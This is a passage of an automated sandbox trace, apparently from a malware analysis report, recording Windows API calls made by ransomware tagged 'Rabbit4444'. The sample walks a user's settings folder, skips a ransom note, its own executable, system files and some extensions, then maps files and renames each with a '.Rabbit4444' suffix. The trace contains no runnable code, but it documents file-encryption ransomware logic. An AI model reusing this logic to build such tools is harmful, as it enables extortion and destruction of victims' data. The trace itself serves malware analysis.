(lpBaseAddress=0x70000) returned 1 [0058.698] CloseHandle (hObject=0x298) returned 1 [0058.698] CloseHandle (hObject=0x278) returned 1 [0058.698] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms.Rabbit4444") returned 192 [0058.698] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5dd91132-02e8-43f6-88bd-e50b7be2ef29}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5dd91132-02e8-43f6-88bd-e50b7be2ef29}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.699] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ed5e0a6, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4ed5e0a6, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231aa1ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms", cAlternateFileName="CL5DD0~1.SET")) returned 1 [0058.699] lstrcmpiW (lpString1="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.699] lstrcmpiW (lpString1="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.699] lstrcmpiW (lpString1="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.699] lstrcmpiW (lpString1="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms", lpString2=".") returned 1 [0058.699] lstrcmpiW (lpString1="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms", lpString2="..") returned 1 [0058.699] lstrcmpiW (lpString1="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms", lpString2="windows") returned -1 [0058.699] lstrcmpiW (lpString1="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.699] lstrcmpiW (lpString1="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.699] lstrcmpiW (lpString1="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms", lpString2="boot") returned 1 [0058.699] lstrcmpiW (lpString1="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.699] lstrcmpiW (lpString1="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.699] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms" | out: lpString1="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms") returned="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms" [0058.699] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.700] lstrlenW (lpString="Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms") returned 64 [0058.700] lstrlenW (lpString="Rabbit4444") returned 10 [0058.700] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.700] lstrlenW (lpString=".dll") returned 4 [0058.700] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.700] lstrlenW (lpString=".lnk") returned 4 [0058.700] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.700] lstrlenW (lpString=".ini") returned 4 [0058.700] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.700] lstrlenW (lpString=".sys") returned 4 [0058.700] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.700] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5de5b491-2cea-4ad9-824a-982a22c0b64e}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.700] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.700] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15001108911) returned 1 [0058.700] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=966) returned 1 [0058.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0058.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0058.701] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0058.702] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0058.702] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.703] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.703] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.703] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.703] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.703] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15001371787) returned 1 [0058.703] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0058.703] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0058.703] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.703] CloseHandle (hObject=0x298) returned 1 [0058.703] CloseHandle (hObject=0x278) returned 1 [0058.703] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms.Rabbit4444") returned 192 [0058.703] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5de5b491-2cea-4ad9-824a-982a22c0b64e}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5de5b491-2cea-4ad9-824a-982a22c0b64e}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.704] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4edf6a31, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4edf6a31, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23137ab2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x371, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms", cAlternateFileName="CL8DAC~1.SET")) returned 1 [0058.704] lstrcmpiW (lpString1="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.704] lstrcmpiW (lpString1="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.704] lstrcmpiW (lpString1="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.704] lstrcmpiW (lpString1="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms", lpString2=".") returned 1 [0058.704] lstrcmpiW (lpString1="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms", lpString2="..") returned 1 [0058.704] lstrcmpiW (lpString1="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms", lpString2="windows") returned -1 [0058.704] lstrcmpiW (lpString1="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.728] lstrcmpiW (lpString1="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.728] lstrcmpiW (lpString1="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms", lpString2="boot") returned 1 [0058.746] lstrcmpiW (lpString1="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.747] lstrcmpiW (lpString1="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.747] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms" | out: lpString1="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms") returned="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms" [0058.747] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.747] lstrlenW (lpString="Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms") returned 64 [0058.747] lstrlenW (lpString="Rabbit4444") returned 10 [0058.747] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.747] lstrlenW (lpString=".dll") returned 4 [0058.747] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.747] lstrlenW (lpString=".lnk") returned 4 [0058.747] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.747] lstrlenW (lpString=".ini") returned 4 [0058.747] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.747] lstrlenW (lpString=".sys") returned 4 [0058.747] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.747] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.748] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.748] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15006045924) returned 1 [0058.750] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=881) returned 1 [0058.750] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0058.750] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0058.750] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x680, lpName=0x0) returned 0x298 [0058.751] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x680) returned 0x70000 [0058.752] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.752] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0058.752] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.752] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.752] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.752] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.752] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.753] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0058.753] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15006331569) returned 1 [0058.753] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0058.753] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0058.753] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.753] CloseHandle (hObject=0x298) returned 1 [0058.753] CloseHandle (hObject=0x278) returned 1 [0058.753] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms.Rabbit4444") returned 192 [0058.753] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.754] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efc061f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4efc061f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x220f9a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x431, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms", cAlternateFileName="CL806F~1.SET")) returned 1 [0058.754] lstrcmpiW (lpString1="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.754] lstrcmpiW (lpString1="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.754] lstrcmpiW (lpString1="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.754] lstrcmpiW (lpString1="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms", lpString2=".") returned 1 [0058.754] lstrcmpiW (lpString1="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms", lpString2="..") returned 1 [0058.754] lstrcmpiW (lpString1="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms", lpString2="windows") returned -1 [0058.754] lstrcmpiW (lpString1="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.754] lstrcmpiW (lpString1="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.754] lstrcmpiW (lpString1="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms", lpString2="boot") returned 1 [0058.754] lstrcmpiW (lpString1="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.754] lstrcmpiW (lpString1="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.754] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms" | out: lpString1="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms") returned="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms" [0058.754] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.755] lstrlenW (lpString="Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms") returned 64 [0058.755] lstrlenW (lpString="Rabbit4444") returned 10 [0058.755] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.755] lstrlenW (lpString=".dll") returned 4 [0058.755] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.755] lstrlenW (lpString=".lnk") returned 4 [0058.755] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.755] lstrlenW (lpString=".ini") returned 4 [0058.755] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.755] lstrlenW (lpString=".sys") returned 4 [0058.755] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.755] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{60ac7fa0-a928-4d45-b4dd-ac70a6175e67}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.755] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.755] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15006602332) returned 1 [0058.755] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1073) returned 1 [0058.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0058.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0058.755] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0058.758] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0058.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0058.759] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0058.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.759] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15006963475) returned 1 [0058.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0058.759] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0058.759] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.759] CloseHandle (hObject=0x298) returned 1 [0058.759] CloseHandle (hObject=0x278) returned 1 [0058.759] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms.Rabbit4444") returned 192 [0058.759] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{60ac7fa0-a928-4d45-b4dd-ac70a6175e67}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{60ac7fa0-a928-4d45-b4dd-ac70a6175e67}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.760] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f2bb529, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4f2bb529, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2227720e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x401, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms", cAlternateFileName="CL44C6~1.SET")) returned 1 [0058.760] lstrcmpiW (lpString1="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.760] lstrcmpiW (lpString1="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.760] lstrcmpiW (lpString1="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.760] lstrcmpiW (lpString1="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms", lpString2=".") returned 1 [0058.760] lstrcmpiW (lpString1="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms", lpString2="..") returned 1 [0058.760] lstrcmpiW (lpString1="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms", lpString2="windows") returned -1 [0058.760] lstrcmpiW (lpString1="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.761] lstrcmpiW (lpString1="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.761] lstrcmpiW (lpString1="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms", lpString2="boot") returned 1 [0058.761] lstrcmpiW (lpString1="Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms", lpString2="ids.txt") returned 